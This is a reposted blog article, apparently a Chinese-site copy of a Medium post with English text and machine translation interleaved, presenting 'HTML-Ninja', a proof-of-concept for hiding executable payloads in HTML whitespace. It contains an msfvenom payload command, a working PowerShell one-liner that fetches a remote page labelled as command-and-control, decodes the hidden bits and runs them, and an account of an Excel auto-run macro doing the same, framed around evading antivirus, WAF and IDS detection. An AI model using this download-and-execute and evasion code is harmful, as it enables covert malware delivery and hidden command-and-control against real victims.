當前位置：首頁 > 前端技术 > HTML >内容正文

HTML

漏洞poc和漏洞利用_带HTML的PowershellHTML空白空间隐写术和二进制漏洞利用交付[PoC]

發(fā)布時間：2024/3/12 HTML 21 豆豆

生活随笔收集整理的這篇文章主要介紹了漏洞poc和漏洞利用_带HTML的PowershellHTML空白空间隐写术和二进制漏洞利用交付[PoC] 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

漏洞poc和漏洞利用

實用隱寫術 (Practical Steganography)

A few years ago I came across a very academic challenge: it was a ZIP file containing a particular HTML page, the aim was to obtain the usual FLAG.

幾年前，我遇到了一個非常學術性的挑戰(zhàn)：這是一個包含特定HTML頁面的ZIP文件，目的是獲得通常的標志。

The web page didn’t have any “juicy clue”, script, image or anything else. The only strange thing was the size (a few MB) and the source was all in one line.

該網(wǎng)頁沒有任何“多汁的線索”，腳本，圖像或其他任何內(nèi)容。唯一奇怪的是它的大小(幾MB)，并且源代碼全部放在一行中。

The element that made me suspicious was the content: it was an extract from a Wikipedia page that kept repeating itself many times. So I tried looking for differences between one repetition and another, but I couldn’t find anything at all from a browser and therefore I checked the source directly. From there I discovered that I wasn’t able to find the same occurrences within the page, up to a certain point from which the code began to repeat itself constantly.

令我感到懷疑的要素是內(nèi)容：它是來自Wikipedia頁面的摘錄，該頁面不斷重復多次。因此，我嘗試查找一個重復與另一個重復之間的差異，但是我根本無法從瀏覽器中找到任何內(nèi)容，因此我直接檢查了源。從那里，我發(fā)現(xiàn)我無法在頁面中找到相同的事件，直到代碼開始不斷重復的某個點為止。

Analyzing the differences in the HTML source, the only thing that emerged were double spaces between the words, arranged in an apparently random way.

分析HTML源代碼中的差異，唯一出現(xiàn)的是單詞之間的雙倍空格，以明顯隨機的方式排列。

Even I don’t know how I got there, but looking on the Internet I found some papers of Indian undergraduates (I think they were Indians) that illustrated the theory for implementing “inter-word” white spaces steganography (something like SNOW plus an interesting vector): applying their thesis to my own custom scripts I managed to trace binary files hidden within these duplicate white spaces on the page.

甚至我都不知道如何到達那里，但是在互聯(lián)網(wǎng)上，我發(fā)現(xiàn)一些印度大學生(我認為他們是印度人)的論文，闡述了實現(xiàn)“字間”空白隱寫術的理論(例如SNOW和有趣的向量)：將其論文應用于我自己的自定義腳本中，我設法跟蹤了隱藏在頁面上這些重復空白中的二進制文件。

The files were images, which contained other images, compressed files, their passwords and finally the FLAG hidden in a digital audio file. And that was the challenge and the end of it.

這些文件是圖像，其中包含其他圖像，壓縮文件，它們的密碼以及最后隱藏在數(shù)字音頻文件中的標志。這就是挑戰(zhàn)，也是挑戰(zhàn)的終點。

這個概念 (The Concept)

As you can see, I quoted SNOW (SNOW exploits the Steganographic Nature Of Whitespace).

如您所見，我引用了SNOW(SNOW利用空白的隱寫性質(zhì))。

What SNOW does is to append white spaces (spaces and tabs) at the end of each line of an ASCII file, thus encoding binary data and encrypting them in various ways. The advantage and limitation of this solution is that the amount of data that I can insert into a document is almost unlimited in relation to the number of lines available. The real disadvantage is that any text editor is able to highlight excess suspicious spaces and tabs at the end of the line, just like this information can be lost if the file is processed with parsers.

SNOW的作用是在ASCII文件的每一行的末尾添加空格(空格和制表符)，從而對二進制數(shù)據(jù)進行編碼并以各種方式對其進行加密。該解決方案的優(yōu)點和局限性在于，相對于可用的行數(shù)，我可以插入到文檔中的數(shù)據(jù)量幾乎是無限的。真正的缺點是，任何文本編輯器都可以在行的末尾突出顯示多余的可疑空格和制表符，就像如果使用解析器處理文件時會丟失此信息一樣。

Steganography of inter-word white spaces, when applied to web pages, lets us insert any kind of binary data between one word and another, in an absolutely invisible way from a browser and hardly recognizable by reading the source: if you don’t know it’s there you will hardly notice it, because an extra space between one tag or word and the other does not make you think anything bad.

單詞間空白的隱寫術應用于網(wǎng)頁時，使我們可以在瀏覽器中以一種絕對不可見的方式在一個單詞和另一個單詞之間插入任何類型的二進制數(shù)據(jù)，并且很難通過閱讀源代碼來識別：如果您不知道它在那里，您幾乎不會注意到它，因為一個標簽或單詞與另一個標簽或單詞之間的多余空間不會使您覺得不好。

The other positive side is that there is no data loss, because both static and dynamic HTML pages are transmitted to the client and their browser is entirely in charge of their interpretation.

另一個積極的方面是，沒有數(shù)據(jù)丟失，因為靜態(tài)和動態(tài)HTML頁面都被傳輸?shù)娇蛻舳?#xff0c;并且其瀏覽器完全負責其解釋。

Of course we have some limitations: you can enter as much data as the content of the “container” page is long, but this data can be compressed and you don’t necessarily need a lot of capacity if your payload are commands/binary and not information.

當然，我們有一些限制：您可以輸入與“容器”頁面內(nèi)容長一樣長的數(shù)據(jù)，但是可以壓縮此數(shù)據(jù)，并且如果您的有效載荷是命令/二進制文件，并且您不一定需要很多容量，沒有信息。

它是如何工作的 (How does it work)

Long story short: alternating single and double spaces using a sort of Manchester encoding.

長話短說：使用一種曼徹斯特編碼來交替使用單空格和雙空格。

Manchester binary data transmission曼徹斯特二進制數(shù)據(jù)傳輸

So:

所以：

one space == 0
一個空格== 0
two spaces == 1
兩個空格== 1

This is possible because a browser will parse double spaces and always show them as single ones and spaces between tags are invisible to the reader.

這是可能的，因為瀏覽器將解析雙倍空格，并始終將其顯示為單個空格，并且標簽之間的空格對于閱讀器是不可見的。

The file “pippo.html”:

文件“ pippo.html”：

Pippo (Goofy, in precedenza Dippy Dawg e Dippy the Goof<a href="#cite_note-:0-1">[1]</a>) è un <a href="/wiki/Personaggio_immaginario" title="Personaggio immaginario">personaggio immaginario</a> dei <a href="/wiki/Cartone_animato" title="Cartone animato">cartoni animati</a> e dei <a href="/wiki/Fumetti" class="mw-redirect" title="Fumetti">fumetti</a> della <a href="/wiki/Disney" class="mw-redirect" title="Disney">Disney</a>, ideato nel 1932 da <a href="/wiki/Pinto_Colvig" title="Pinto Colvig">Pinto Colvig</a> e dall’animatore Johnny Cannon come comprimario di <a href="/wiki/Topolino" title="Topolino">Topolino</a> in un <a href="/wiki/Cortometraggio" title="Cortometraggio">cortometraggio</a>, ma viene caratterizzato definitivamente dall’animatore <a href="/wiki/Art_Babbitt" title="Art Babbitt">Art Babbitt</a> nel 1935<a href="#cite_note-:0-1">[1]</a> e successivamente esordisce nei fumetti realizzati da <a href="/wiki/Floyd_Gottfredson" title="Floyd Gottfredson">Floyd Gottfredson</a> che definisce ulteriormente il personaggio dandogli spessore come spalla di Topolino<a href="#cite_note-:0-1">[1]</a>. è apparso in centinaia di cartoni animati come protagonista o comprimario<a href="#cite_note-:2-2">[2]</a> e in migliaia di albi a fumetti realizzati in vari paesi del mondo<a href="#cite_note-3">[3]</a>.

…is exactly the same (has the same output) as “pipponinja.html”:

…與“ pipponinja.html”完全相同(具有相同的輸出)：

在實踐中 (In practice)

After banging my head trying to decode that cursed file, I thought of writing a POC to do the reverse operation and try to “weaponize” a possible payload.

在試圖解碼被詛咒的文件后，我想到要寫一個POC來做相反的操作，并試圖“武器化”可能的有效載荷。

Why do I say “weaponize”? Because I challenge any proxy / WAF / AV to analyze and identify every single space, embedded with potentially compressed or password protected payload, within each page sent in clear on a legit HTTP(S) port.

為什么我說“武器化”？因為我要挑戰(zhàn)任何代理/ WAF / AV來分析和識別在合法HTTP(S)端口上以明文形式發(fā)送的每個頁面中嵌入了可能受壓縮或受密碼保護的有效負載的每個單個空間。

[actually it’s just extremely fun to put an MSF payload into an HTML file and make it “executable”]

[實際上，將MSF有效負載放入HTML文件并使它“可執(zhí)行”是非常有趣的。”

This is how HTML-Ninja is born, in the absence of better acronyms.

在沒有更好的縮寫的情況下， HTML-Ninja就是這樣誕生的。

The tool, raw and incomplete, is a POC written mainly in Python (with Javascript and VBA variants) and allows you to insert, extract and execute payloads within HTML files. Other features have been added in the meantime but it still is a free time project which has not had much feedback.

該工具是原始的和不完整的，主要是用Python(帶有Javascript和VBA變體)編寫的POC，并且允許您在HTML文件中插入，提取和執(zhí)行有效載荷。同時添加了其他功能，但它仍然是一個免費項目，沒有太多反饋。

Help excerpt:

幫助摘錄：

html-ninja.py -e source content outfile -> will encode the payload file 'content' into file 'source' and output the result as 'outfile'
html-ninja.py -d source outfile -> will try to decrypt white spaces in 'source' file into 'outfile'
html-ninja.py --check filename -> will check 'filename' for available spaces and spaces needed to embed the file
html-ninja.py -d http://localhost/html-ninja.html stdout -> will get http url and output to stdout
html-ninja.py -d http://localhost/html-ninja.html exec -> will get http url and execute the hex payload (payload must have a '|' terminator)
html-ninja.py -ez / -dz ... -> adds zlib compression to both encryption and decryptionhtml-ninja.py -eb / -db ... -> adds bz2 compression to both encryption and decryption

Examples on github include:

github上的示例包括：

html-ninja.js和html-ninja.html (html-ninja.js & html-ninja.html)

Javascript version and sample HTML showing a “self-decryption” page.

Javascript版本和示例HTML，顯示“自解密”頁面。

macro_poc.bas和htm (macro_poc.bas & htm)

VBA version for automatic execution of payloads via Excel.

VBA版本，可通過Excel自動執(zhí)行有效負載。

buf.txt (buf.txt)

Example of a MSF payload:

MSF有效負載示例：

msfvenom -p linux/x64/exec CMD="whoami;id;uname -a" -f python -o buf.txt

…and a few others…

…和其他一些…

示范 (Demonstration)

Let’s take our buf.txt payload and hide it with zlib compression in pippo.html

讓我們獲取buf.txt有效負載，并在pippo.html中使用zlib壓縮將其隱藏

Now let’s “read” the content of pipporun.html

現(xiàn)在，讓我們“閱讀” pipporun.html的內(nèi)容

帶HTML的Powershell的二進制漏洞利用交付[PoC] (Binary Exploit Delivery w/Powershell over HTML [PoC])

Static HTML file gets downloaded -> HTML hides binary data -> HTML gets “executed”

下載靜態(tài)HTML文件-> HTML隱藏二進制數(shù)據(jù)->“執(zhí)行” HTML

Harmless static HTML page with embedded binary payload: https://ephreet.github.io/html-ninja/

具有嵌入式二進制有效負載的無害靜態(tài)HTML頁面： https ： //ephreet.github.io/html-ninja/

Could embed msfvenom meterpreter or any other file, but for the sake of the PoC we are going with the usual “calc.exe”.

可以嵌入msfvenom meterpreter或任何其他文件，但是出于PoC的考慮，我們將使用通常的“ calc.exe”。

Proof of Concept run (payload = “iex calc.exe”):

概念驗證運行(有效載荷=“ iex calc.exe”)：

$CnC = "https://ephreet.github.io/html-ninja/"; $pch = "nil"; $b = ""; $ch = ""
foreach ($cu in (Invoke-WebRequest $CnC -UserAgent "Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0").ToString().tocharArray()) {$ch = $cu;if ($pch -eq " "){if ($ch -eq " "){$b = $b + "1"; $ch = "nil"}else{$b = $b + "0";$ch = "nil"}};$pch = $ch}$c = ""
($b -split '(\w{8})' | ? {$_}) | ForEach-Object {$c = $c + [convert]::Tochar([System.Convert]::ToByte($_,2))};$p = $c.Split(" "); & $p[0] $p[1]

Source: https://github.com/ephreet/html-ninja/

資料來源： https : //github.com/ephreet/html-ninja/

沙盒[ANY.RUN] (SANDBOX [ANY.RUN])

Let’s see what a sandbox sees in relation to the payload inserted in Excel macro.

讓我們來看看與插入Excel宏中的有效負載有關的沙箱。

Used sandbox: any.run

二手沙箱： any.run

Payload: cmd.exe

有效負載：cmd.exe

The Excel file contains an onload macro that makes the request for the payload via HTTP and executes its content using the algorithm. I expect the abnormal behavior of the script and the download to be detected, but this is a simulation imagining an already running service.

Excel文件包含一個onload宏，該宏通過HTTP發(fā)出對有效負載的請求，并使用算法執(zhí)行其內(nèi)容。我希望可以檢測到腳本和下載的異常行為，但這是模擬一個已經(jīng)在運行的服務。

The Excel file is opened and the payload executed, then it works. Obviously the sandbox realizes that something is wrong because the file has contacted a website and a command has been executed.

將打開Excel文件并執(zhí)行有效負載，然后它就會工作。顯然，沙箱意識到出了點問題，因為該文件已與網(wǎng)站聯(lián)系并且已執(zhí)行命令。

Analyzing the HTTP request we can only see harmless HTML source:

分析HTTP請求，我們只能看到無害HTML源：

Which in this example is saved locally even if I am not required to do so, it doesn’t generate big alarms however:

即使我不需要在此示例中將其保存在本地，也不會生成大警報：

Let’s check on VirusTotal anyway:

無論如何，讓我們檢查VirusTotal：

These are the suspicious indicators: it is clearly unusual for Excel to make HTTP requests, but no alarm from IPS or IDS:

這些是可疑的指標：Excel發(fā)出HTTP請求顯然很罕見，但是沒有來自IPS或IDS的警報：

To be clear, normally there would be some evidence like these, which are precisely the Suricata rules:

需要明確的是，通常會有一些類似的證據(jù)，這些正是Suricata規(guī)則：

Okay, the sandbox notices (of course) and the URL is quite obvious. Even a static analysis of the sample would have allowed us to trace the behavior.

好的，沙盒會發(fā)出通知(當然)，并且URL很明顯。甚至樣本的靜態(tài)分析也可以讓我們追蹤行為。

But what if instead of delivering the payload I installed a service? What if it were a browser plugin? In short, if I could avoid the sandbox and the connections were towards http://random.foo/info.htm (invented!) could I rely only on the reputation of a domain?

但是，如果我沒有提供有效載荷，而是安裝了服務，該怎么辦？如果是瀏覽器插件怎么辦？簡而言之，如果我能避免使用沙箱，并且連接指向http://random.foo/info.htm (已發(fā)明！)，我是否只能依靠域名的信譽？

結論 (Conclusions)

Okay, it’s a POC. Yes, a payload must still be delivered before it can be executed. And yes, a sandbox will still notice what is being done.

好的，這是一個POC。是的，有效負載仍然必須交付才能執(zhí)行。是的，沙箱仍會注意到正在執(zhí)行的操作。

But let’s imagine a more targeted version, perhaps with an offset from which to read the steganographed part in an HTML page, a service running on your PC that makes web requests to absolutely harmless pages that we control.

但是，讓我們想象一個更具針對性的版本，也許有一定的偏移量，可以讀取HTML頁面中的隱秘部分，這是一種在您的PC上運行的服務，可向我們控制的絕對無害的頁面發(fā)出Web請求。

Wouldn’t that be a Command and Control hidden in plain sight? After the sandbox, would an IPS / IDS be able to intercept it?

難道這不是隱藏在視線中的命令和控制嗎？沙箱之后，IPS / IDS是否可以攔截它？

Meanwhile, I certainly had a lot of fun opening a reverse shell by “running” an HTML file.

同時，通過“運行” HTML文件打開反向外殼當然很有趣。

翻譯自: https://medium.com/swlh/html-whitespace-steganography-binary-exploit-delivery-w-powershell-over-html-poc-68fc286c581d